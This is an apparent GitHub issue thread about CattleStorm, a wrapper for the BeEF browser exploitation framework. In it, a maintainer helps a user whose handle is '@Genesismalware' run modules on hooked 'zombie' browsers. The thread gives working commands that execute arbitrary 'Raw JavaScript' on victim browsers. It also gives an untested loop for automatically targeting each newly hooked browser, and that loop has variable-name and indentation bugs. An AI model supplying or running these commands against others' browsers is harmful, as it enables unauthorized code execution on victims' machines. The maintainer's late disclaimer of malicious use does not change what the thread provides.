trying your tool but getting the error below, can you help me out to set it up, about cattlestorm HOT 8 CLOSED

Hi Wandas, to loop, you can either go with a bash loop and execute the script multiple times.
python3 CattleStorm.py -u <user> -p <pass> --url https://<domain.com> -m "Play Sound" -mp "sound_file_uri=march.mp3" && python3 CattleStorm.py -u <user> -p <pass> --url https://<domain.com>-m "Raw JavaScript" -mp "cmd=your_javascript.js"

But if you want to filter new browsers, this would require you to implement a while loop in the script and adapt the hooked_browsers in the Python script to track browsers you already executed on before in a list and only run commands on the new browsers. You can implement something like the following (did not test):

from time import sleep

targeted_browsers = []
while True:
    hooked_browsers = fetch_hooked_browsers(beef_api_url, auth_token)

   target_browsers = []

   for hooked_browser in hooked_browsers:
       if hooked_browsers not in targeted_browsers:
           target_browsers.append(hooked_browsers) # list to execute on this time
           targeted_browsers.append(hooked_browsers) # append browser to avoid execution next time

    run_module(module_id, target_browsers, params, beef_api_url, auth_token)

    # sleep 30 seconds
    sleep(30)

The easiest would be to implement something like above and call the python script twice in separate terminals. Otherwise, you can adapt the script further to include two run_module calls with different modules and parameters. In this case lines 120 to 138 should also be part of your loop.

It's up to you to be creative!

from cattlestorm.

Hi wandas,

I see two potential issues in your command.

1. The --url parameter does not need /ui/panel. You should simply use http://yourdomain.com. The script will automatically connect to the correct endpoints.
2. When using a module like Play Sound, you should check the code (https://github.com/beefproject/beef/blob/3286ef88f49163e02e7add46c0458b3570bb6fdb/modules/browser/play_sound/module.rb#L9) . This mentions it need the sound_file_uri parameter --> -m "Play Sound" -mp "sound_file_uri=http://xxx.xxx/sound.wav"

Try like this:
python3 CattleStorm.py -u faboo -p faboowand --url http://xxx.xxx.xxx.xxx:3000 -m "Play Sound" -mp "sound_file_uri=http://xxx.xxx.xxx.xxx/sound.wav"

from cattlestorm.

Hi wandas1212,

Could it be that you executed it without arguments? You should pass your beef login user, password and URL and then choose a module to execute with the appropriate parameters, e.g. the following command will read a raw javascript from disk and execute it on the zombie browsers:
python3 CattleStorm.py -u <beef-user> -p <beef-password> --url <beef-url> -m "Raw JavaScript" -mp "cmd=path/to/script.js"

from cattlestorm.

python3 CattleStorm.py -u faboo -p faboowand --url http://XXX.XXX.XXX.XXX:3000/ui/panel -m "Play Sound" -mp "http://XXX.XXX.XXX.XXX/sound.wav"

▄████▄ ▄▄▄ ▄▄▄█████▓▄▄▄█████▓ ██▓ ▓█████ ██████ ▄▄▄█████▓ ▒█████ ██▀███ ███▄ ▄███▓
▒██▀ ▀█ ▒████▄ ▓ ██▒ ▓▒▓ ██▒ ▓▒▓██▒ ▓█ ▀ ▒██ ▒ ▓ ██▒ ▓▒▒██▒ ██▒▓██ ▒ ██▒▓██▒▀█▀ ██▒
▒▓█ ▄ ▒██ ▀█▄ ▒ ▓██░ ▒░▒ ▓██░ ▒░▒██░ ▒███ ░ ▓██▄ ▒ ▓██░ ▒░▒██░ ██▒▓██ ░▄█ ▒▓██ ▓██░
▒▓▓▄ ▄██▒░██▄▄▄▄██░ ▓██▓ ░ ░ ▓██▓ ░ ▒██░ ▒▓█ ▄ ▒ ██▒░ ▓██▓ ░ ▒██ ██░▒██▀▀█▄ ▒██ ▒██
▒ ▓███▀ ░ ▓█ ▓██▒ ▒██▒ ░ ▒██▒ ░ ░██████▒░▒████▒▒██████▒▒ ▒██▒ ░ ░ ████▓▒░░██▓ ▒██▒▒██▒ ░██▒
░ ░▒ ▒ ░ ▒▒ ▓▒█░ ▒ ░░ ▒ ░░ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░░ ▒░ ░ ░
░ ▒ ▒ ▒▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░ ░
░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░

[+] Feching token...
Traceback (most recent call last):
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 151, in
main()
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 116, in main
auth_token = fetch_token(args.username, args.password, beef_api_url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 52, in fetch_token
auth_token = json.loads(auth_response.content)["token"]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/init.py", line 346, in loads
return _default_decoder.decode(s)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

┌──(wandas㉿kali11)-[~/Desktop/python/CattleStorm-main]

still getting the error above, can you help me out, i have been on this for couple of days now,
you can get in touch with me on telegram with the ID wandas1212 or email [email protected]

from cattlestorm.

it has worked very well, i am really grateful,
also i will be very happy if you could help me out on the following,
i want to achieve the following,

i want to loop the code forever so that once a new browser comes online, the command modules that i have set should run on them,

also i want to run more than 2 command modules.

thanks a lot,
WANDAS

from cattlestorm.

i am really grateful, and always happy whenever i see your message,
will like to get in touch with you,
will really appreciate it if you could text me on telegram with the ID @Genesismalware, or on [email protected],

really grateful.
WANDAS

from cattlestorm.

Please note that I do not approve or support malicious usage of my tools. This is meant for educational purposes and proof of concepts only.

from cattlestorm.

yup,
i get you, and i am also using it for education purposes only, i only scripts malwares as my project, i don't use them for any bad purposes,
the malware in my telegram ID is just to show that i only do malware, but i don't use them for any bad reasons,

from cattlestorm.